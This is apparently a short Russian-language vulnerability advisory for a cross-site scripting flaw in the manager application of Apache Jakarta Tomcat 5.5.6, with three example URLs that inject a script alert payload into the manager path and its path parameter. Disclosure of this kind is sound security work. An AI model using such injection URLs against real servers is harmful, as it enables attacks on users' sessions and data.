Программа: Apache Jakarta Tomcat 5.5.6
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным пользователей.
Уязвимость обнаружена при обработке данных в сценарии manager Tomcat. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы.
Пример:
http://[target]:8080/manager/html/ <script>alert("Hallo")</script>
http://[target]:8080/manager/html/ stop ?path=<script>alert("Hallo")</script>
http://[target]:8080/manager/html/ start?path=<script>alert("Hallo")</script>
